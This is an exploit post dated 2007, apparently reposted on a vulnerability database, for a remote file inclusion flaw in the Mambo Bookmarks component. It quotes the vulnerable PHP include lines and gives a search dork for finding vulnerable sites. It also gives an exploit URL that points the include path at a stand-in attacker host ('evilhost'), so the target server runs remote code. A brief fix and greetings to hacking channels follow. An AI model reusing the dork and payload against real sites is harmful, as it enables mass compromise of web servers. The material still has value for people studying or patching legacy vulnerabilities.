Application Bookmarks mambo Component URL Variable $mosConfig_absolute_path not sanitized xpl works with register_globals=on in components/com_bookmarks/bookmarks_export.php Exploit dork com_bookmark
`Application : Bookmarks - mambo Component
URL :
http://mamboxchange.com/frs/download.php/4274/MOS_Com_Bookmarks25-Final_a.zip
Variable $mosConfig_absolute_path not sanitized: xpl works with
register_globals=on
in components/com_bookmarks/bookmarks_export.php on line 22,27,29
$require_once( $mosConfig_absolute_path . "/includes/mambo.php" );
$include_once($mosConfig_absolute_path.'/components/com_bookmarks/language/'
. $mosConfig_lang . '.php');
$include_once($mosConfig_absolute_path.'/components/com_bookmarks/language/english.php');
Exploit:
~~~~~~~~
dork: "com_bookmarks"
http://www.vuln.com/components/com_bookmarks/bookmarks_export.php?mosConfig_absolute_path=http://evilhost
Fix
~~~~
Add before code:
defined('_VALID_MOS') or die('Direct access to this location is not
allowed.');
Discovered By : vitux
Thanks To : #[email protected], #[email protected], #batamhacker@
dal.net, #[email protected]
special To : donny indocom, eko indocom, ^BLaCk_BaNDitS^, urang
subang sadaya, pokona mah kabeh lah
mail : [email protected], [email protected]
# cilacap 12th august 2007
`
Transform Your Security Services
Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.
Book a live demo